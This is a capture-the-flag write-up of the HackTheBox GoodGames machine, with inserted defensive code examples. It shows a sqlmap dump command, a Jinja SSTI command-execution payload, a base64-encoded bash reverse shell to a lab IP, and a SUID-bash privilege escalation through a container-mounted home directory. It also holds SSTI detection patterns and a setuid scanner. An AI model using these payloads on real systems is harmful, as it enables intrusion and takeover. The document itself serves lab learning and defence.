HackTheBox — GoodGames

ARZ101
7 min read, Feb 22, 2022


Hello everyone, in this post I will be sharing my writeup for the HTB GoodGames machine, an easy Linux box that was made for the HTB University CTF and later released into the retired machines pool. Starting off with nmap, we can see that only port 80 is open, serving a web page that allows us to log in. The login page was vulnerable to a time-based SQL injection; through sqlmap we dumped the data and found the admin hash for the web page. After cracking that we logged into the site and found another login page for a Flask application, which we got access to through password reuse of the admin user. Being a Flask application it was vulnerable to Server Side Template Injection (SSTI), which gave us command execution and a reverse shell, and we landed in a Docker container. The container had a file system of the host machine mounted, specifically the home directory of augustus. After putting an SSH public key there we were able to log in on the host machine, since the Docker gateway IP was the host machine's. And since we had access to that directory and files created from the container were owned by root, we were able to put a copy of bash with SUID there and get root on the host machine.

NMAP

PORT   STATE SERVICE  VERSION
80/tcp open ssl/http Werkzeug/2.0.2 Python/3.9.2
|_http-favicon: Unknown favicon MD5: 61352127DC66484D3736CACCF50E7BEB
| http-methods:
|_ Supported Methods: GET HEAD OPTIONS POST
|_http-server-header: Werkzeug/2.0.2 Python/3.9.2
|_http-title: GoodGames | Community and Store

PORT 80 (HTTP)

Visiting port 80 shows a gaming site that lists the current games.

But it's just a static page whose links don't lead anywhere, and there's a store page which says it will be available soon.

There's a login page, but it asks for an email address, so I left this form and went with signing up a user.

After creating a user we can log in on the site.

With the password reset, I tried to see if it was taking a username in the parameters.

It wasn't taking any username, so taking a step back to the login page:

We can't test for SQLi directly in the form, as it checks that the input matches the format of an email address, so I intercepted the request with Burp, saved the request, and then ran sqlmap against it.

This shows that it's vulnerable to SQLi, so let's dump the database.

Being a time-based SQLi, it takes some time to dump the data; since we only want the users table, let's dump just that:

sqlmap -r sql --batch -D main -T user --dump
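Why the email-format check on the form did not protect the login, as an added example (not code from the box or the write-up): the injectable pattern beside its parameterized form, over a constructed in-memory stand-in for the `main` database. The column names, the admin email and the unsalted SHA-256 hashing are assumptions; only the `user` table name and the cracked password come from the write-up.

```python
import hashlib
import sqlite3
from typing import Optional, Tuple

def make_demo_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the site's `main` database. Only the
    table name `user` comes from the write-up; the columns, the admin row and
    the (unsalted SHA-256) hashing are assumptions made for this example."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user (id INTEGER PRIMARY KEY, email TEXT, password TEXT)")
    conn.execute("INSERT INTO user VALUES (1, ?, ?)",
                 ("admin@goodgames.htb", hashlib.sha256(b"superadministrator").hexdigest()))
    return conn

def login_vulnerable(conn: sqlite3.Connection, email: str, password: str) -> Optional[Tuple[int, str]]:
    """The injectable pattern: form values are spliced into the SQL text. The
    browser-side email-format check means nothing here, because the request can
    be replayed (as the write-up does with Burp) with any string in the field."""
    pw_hash = hashlib.sha256(password.encode()).hexdigest()
    query = f"SELECT id, email FROM user WHERE email = '{email}' AND password = '{pw_hash}'"
    return conn.execute(query).fetchone()

def login_safe(conn: sqlite3.Connection, email: str, password: str) -> Optional[Tuple[int, str]]:
    """Same lookup with bound parameters: the input is data, never SQL syntax, so
    neither the boolean nor the time-based variant has anything to inject into."""
    pw_hash = hashlib.sha256(password.encode()).hexdigest()
    query = "SELECT id, email FROM user WHERE email = ? AND password = ?"
    return conn.execute(query, (email, pw_hash)).fetchone()

if __name__ == "__main__":
    db = make_demo_db()
    # A quote plus a comment sequence ends the email literal and drops the password check.
    crafted = "admin@goodgames.htb' -- "
    print("vulnerable:", login_vulnerable(db, crafted, "wrong-password"))  # admin row
    print("parameterized:", login_safe(db, crafted, "wrong-password"))     # None
```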

We can skip the rest of the data as we only need the admin hash. Using CrackStation to crack the hash we get the password superadministrator.

So, logging in with the admin credentials:

On becoming admin, we can see another option which takes us to internal-administration.goodgames.htb.

This brings us to another login page, for Flask Volt.

I looked for default credentials for this, but it seems to be just a GitHub template for a Flask application login page. Being a Flask application, it might be vulnerable to one of the common attacks, Server Side Template Injection (SSTI), so this is the first thing I would look at.

So now let's look for an input field where we can test for SSTI payloads.

The settings page has an input field for the username, so testing with the payload {{7*7}} should return the result 49.

It did. Now we need to find which template engine it's using; to do that we can check with the payload {{7*'7'}}: if it still returns 49 it's using Twig, and if it returns 7777777 it's using Jinja.

So it's Jinja. Now we need a payload to get command execution:

{{ self._TemplateReference__context.joiner.__init__.__globals__.os.popen('id').read() }}

Using this payload we can execute shell commands.
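What the defending side of this step looks like, as an added example (not code from the box or the write-up): an allow-list check for the username field, plus detection logic that decodes the username parameter from request log lines and flags the `{{7*7}}` / `{{7*'7'}}` fingerprint and the dunder walk toward `os.popen` seen above. The `/settings` path, the log line shape and the client IP are constructed assumptions.

```python
import re
from typing import List, Tuple
from urllib.parse import unquote_plus

# Delimiters of the template engines usually met behind a username field:
# jinja/twig "{{ }}" and "{% %}", plus "${ }" and "<% %>" used by others.
TEMPLATE_DELIMS = re.compile(r"\{\{|\{%|\}\}|%\}|\$\{|<%")

# Signatures of the probes above: the arithmetic fingerprint {{7*7}} / {{7*'7'}}
# and the attribute walk toward os.popen in the command-execution payload.
PROBE_PATTERNS = [
    ("arith-probe", re.compile(r"\{\{\s*\d+\s*\*\s*['\"]?\d+['\"]?\s*\}\}")),
    ("dunder-walk", re.compile(r"__(?:globals|init|class|mro|subclasses|builtins)__")),
    ("os-exec", re.compile(r"\b(?:popen|system|subprocess)\b")),
]

def classify_username(value: str) -> List[str]:
    """Findings for one submitted username value (empty list = looks benign)."""
    findings = []
    if TEMPLATE_DELIMS.search(value):
        findings.append("template-delimiter")
    for name, pattern in PROBE_PATTERNS:
        if pattern.search(value):
            findings.append(name)
    return findings

def is_acceptable_username(value: str) -> bool:
    """Allow-list check for the settings form: braces and percent signs never pass,
    so the template engine never sees a user-controlled expression."""
    return re.fullmatch(r"[A-Za-z0-9._-]{1,32}", value) is not None

def scan_log(lines: List[str]) -> List[Tuple[int, str, List[str]]]:
    """Decode the username parameter of each request line and keep the suspicious ones."""
    hits = []
    for number, line in enumerate(lines, start=1):
        for token in line.split():
            if token.startswith("username="):
                value = unquote_plus(token[len("username="):])
                findings = classify_username(value)
                if findings:
                    hits.append((number, value, findings))
    return hits

# Constructed request log: hypothetical client IP and path, payload shapes from the write-up.
SAMPLE_LOG = """\
10.10.14.77 POST /settings username=%7B%7B7*7%7D%7D
10.10.14.77 POST /settings username=%7B%7B7*%277%27%7D%7D
10.10.14.77 POST /settings username=%7B%7B+self._TemplateReference__context.joiner.__init__.__globals__.os.popen(%27id%27).read()+%7D%7D
10.10.14.77 POST /settings username=arz101
""".splitlines()
```

`scan_log(SAMPLE_LOG)` flags the first three lines and leaves the plain username alone.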

This runs as the root user. Normally you would get a low-privileged user like www-data or some other user, so it could be that this application is hosted in a Docker container. Using a bash reverse shell we can get a shell, by first converting the reverse shell payload to base64:

echo "bash -i >& /dev/tcp/10.10.14.77/2222 0>&1" | base64

{{ self._TemplateReference__context.joiner.__init__.__globals__.os.popen('echo "YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC43Ny8yMjIyIDA+JjEK" |base64 -d| bash').read() }}

Running ifconfig:

This IP address tells us that we are indeed inside a container. Running df -h to see disk space, we can see a directory /home/augustus from /dev/sda1; as this user doesn't exist in this Docker container, this is probably mounted from the host machine.

So here I thought of adding an SSH key for augustus by creating a .ssh folder and adding the public key to the authorized_keys file.

And then changing the owner of that folder to augustus.

But the host machine didn't have an SSH service running when we ran nmap; it could be that it's only open locally and we can access it from the container.

We can't reach it from outside, but we know that this container's IP address is 172.19.0.2, and whenever we run a Docker container on a host machine, that machine becomes the gateway and is assigned the IP 172.19.0.1.

Let's verify this by transferring a static binary of nmap.

This shows that ports 80 and 22 are open, so let's give it a shot.

And we are on the host machine now.

Running sudo -l to see what permissions we have, but there's no sudo binary.

So going back again: we saw that we can change permissions in augustus's folder, so let's create a file and see if it gets reflected with root permissions.

Logging back in again, we see that the file has root permissions, so we can just copy bash, make it SUID and run it on the host machine.

But it didn't run and complained about a library file, so I transferred the host machine's bash binary to the Docker container, made that SUID again and then tried running the binary, and it worked.
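The host-side check that would have caught this, as an added example (not code from the box or the write-up): a scanner for a home directory that is bind-mounted into a container, reporting entries not owned by the directory's user and regular files carrying the setuid bit, which is exactly what a root process in the container leaves behind. The demo tree is constructed with a temp directory and an empty file named `bash`; the augustus uid lookup is an assumption named in the comments.

```python
import os
import stat
import tempfile
from typing import List, Tuple

def scan_mounted_home(root: str, expected_uid: int) -> List[Tuple[str, str]]:
    """Walk a home directory that is bind-mounted into a container and report
    what a root process inside the container leaves behind on the host:
      foreign-owner : entry not owned by the home directory's user
      setuid-bit    : regular file with the setuid bit (a planted bash copy)
    Symlinks are not followed, so a planted link cannot redirect the scan."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            if st.st_uid != expected_uid:
                findings.append((path, "foreign-owner"))
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                findings.append((path, "setuid-bit"))
    return findings

def owner_uid(path: str) -> int:
    """Uid that owns a path; on the real host this would be augustus's uid
    (pwd.getpwnam("augustus").pw_uid), here the user running the example."""
    return os.lstat(path).st_uid

def build_demo_home() -> str:
    """Constructed stand-in for the mounted /home/augustus: an authorized_keys
    file plus an empty file named bash carrying the setuid bit. Nothing here
    is executed; the files only reproduce the ownership and mode pattern."""
    root = tempfile.mkdtemp(prefix="augustus-")
    os.makedirs(os.path.join(root, ".ssh"))
    open(os.path.join(root, ".ssh", "authorized_keys"), "w").close()
    bash = os.path.join(root, "bash")
    open(bash, "w").close()
    os.chmod(bash, 0o4755)  # setuid + rwxr-xr-x, as left by the container's root
    return root

if __name__ == "__main__":
    home = build_demo_home()
    for path, reason in scan_mounted_home(home, owner_uid(home)):
        print(f"{reason:14} {path}")
```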
